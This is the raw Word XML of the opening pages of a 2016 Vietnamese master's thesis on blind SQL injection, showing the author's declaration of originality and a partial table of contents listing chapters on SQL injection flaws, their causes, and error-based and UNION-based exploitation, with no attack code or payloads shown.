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F4" w:rsidRDefault="00B24BF4" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc459822478"/>
      <w:r>
        <w:t>LỜI CAM ĐOAN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="005C6F7D" w:rsidRDefault="005C6F7D" w:rsidP="005C6F7D">
      <w:r>
        <w:t>Tôi xin cam đoan đây là công trình nghiên cứu của bản thân, được xuất phát từ yêu cầu phát sinh trong công việc để hình thành hướng nghiên cứu. Các số liệu có nguồn gốc rõ ràng tuân thủ đúng nguyên tắc và kết quả trình bày trong luận văn được thu thập được trong quá trình nghiên cứu là trung thực</w:t>
      </w:r>
      <w:r w:rsidR="00B30B22">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chưa từng được ai công bố trước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A16AC" w:rsidTr="004A16AC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4644" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004A16AC" w:rsidRDefault="004A16AC" w:rsidP="005C6F7D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4644" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004A16AC" w:rsidRDefault="004A16AC" w:rsidP="004A16AC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Hà Nội, tháng 8 năm 2016</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004A16AC" w:rsidRDefault="004A16AC" w:rsidP="004A16AC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Học viên thực hiện</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004A16AC" w:rsidRDefault="004A16AC" w:rsidP="004A16AC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004A16AC" w:rsidRDefault="004A16AC" w:rsidP="004A16AC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004A16AC" w:rsidRDefault="004A16AC" w:rsidP="004A16AC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004A16AC" w:rsidRDefault="004A16AC" w:rsidP="004A16AC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004A16AC" w:rsidRDefault="004A16AC" w:rsidP="004A16AC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Hà Bách Nam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004A16AC" w:rsidRDefault="004A16AC" w:rsidP="005C6F7D"/>
    <w:p w:rsidR="004A16AC" w:rsidRDefault="004A16AC">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="1" w:name="_Toc459822479" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:id w:val="1444739"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00410F30" w:rsidRPr="00612934" w:rsidRDefault="00612934" w:rsidP="00C93A9C">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r>
            <w:t>MỤC LỤC</w:t>
          </w:r>
          <w:bookmarkEnd w:id="1"/>
        </w:p>
        <w:p w:rsidR="005447AB" w:rsidRDefault="00B70950" w:rsidP="008E1FF3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9395"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8931"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00410F30">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc459822478" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LỜI CAM ĐOAN</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822478 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>i</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79" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>MỤC LỤC</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822479 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>ii</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0" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>DANH MỤC TỪ VIẾT TẮT</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822480 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>v</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1" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DA</w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>NH MỤC HÌNH VẼ</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822481 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>vi</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2" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DA</w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">NH MỤC </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BẢNG BIỂU</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822482 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>viii</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483" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>LỜI MỞ ĐẦU</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822483 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005447AB" w:rsidRDefault="001E10B4" w:rsidP="008E1FF3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9395"/>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8931"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc459822484" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chương 1:</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tấn công Blind SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822484 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</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85" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lỗ hổng SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822485 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</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6" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.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Nguyên tắc hoạt động của ứng dụng web sử dụng cơ sở dữ liệu.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822486 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</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7" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.2.</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Lỗ hổng SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822487 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</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8" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.3.</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Nguyên nhân của lỗ hổng SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822488 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</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89" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.4.</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Ảnh hưởng của lỗ hổng SQL injection với tổ chức.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822489 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</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90" w:history="1">
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">1.2.       </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Khai thác lỗ hổng SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822490 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</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1" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.1.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Phân biệt các hình thức tấn công SQL injection.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822491 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</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2" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tấn công sử dụng thông báo lỗi</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822492 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</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3" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.3.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tấn công sử dụng mệnh đề UNION</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822493 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</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4" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.4.</w:t>
            </w:r>
